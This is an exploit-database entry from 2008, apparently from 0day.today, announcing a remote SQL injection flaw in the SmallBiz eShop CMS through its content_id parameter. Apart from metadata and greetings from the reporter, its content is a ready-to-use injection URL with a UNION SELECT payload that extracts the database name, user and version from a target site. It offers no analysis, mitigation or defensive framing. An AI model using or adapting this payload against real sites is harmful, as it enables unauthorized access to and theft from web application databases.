SmallBiz eShop (content_id) Remote SQL Injection Vulnerability

2008-04-14T00:00:00
ID 1337DAY-ID-2878
Type zdt
Reporter Stack
Modified 2008-04-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
SmallBiz eShop (content_id) Remote SQL Injection Vulnerability
==============================================================


###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql Inj. Vuln.
                                                                                                               
[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------



#  0day.today [2018-04-04]  #